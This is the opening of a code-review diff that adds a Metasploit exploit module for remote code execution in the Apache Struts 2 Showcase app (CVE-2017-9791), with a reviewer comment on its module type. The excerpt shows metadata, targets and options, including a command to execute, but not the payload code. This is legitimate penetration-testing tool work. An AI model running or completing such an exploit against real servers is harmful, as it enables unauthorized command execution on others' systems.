modules/exploits/multi/http/struts2_code_exec_showcase.rb

```diff
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'icez <ic3z at qq dot com>',
+        'Nixawk', 
+        'xfer0'
+      ],
+      'References'     => [
+        [ 'CVE', '2017-9791' ],
+        [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048'  ]
+      ],
+      'Platform'       => %w{ linux unix win },
+      'Privileged'     => true,
+      'Targets'        => [
+        [ 'Apache Struts2 / linux', {} ],
+        [ 'Apache Struts2 / unix', {} ],
+        [ 'Apache Struts2 / win', {} ]
+      ],
+      'DisclosureDate' => 'Jul 07 2017',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
+          OptString.new('CMD', [ true, 'The command to be executed', 'whoami' ])
```

Comment:
This module should at least be an `ARCH_CMD` exploit instead of an aux module. Please see #8103.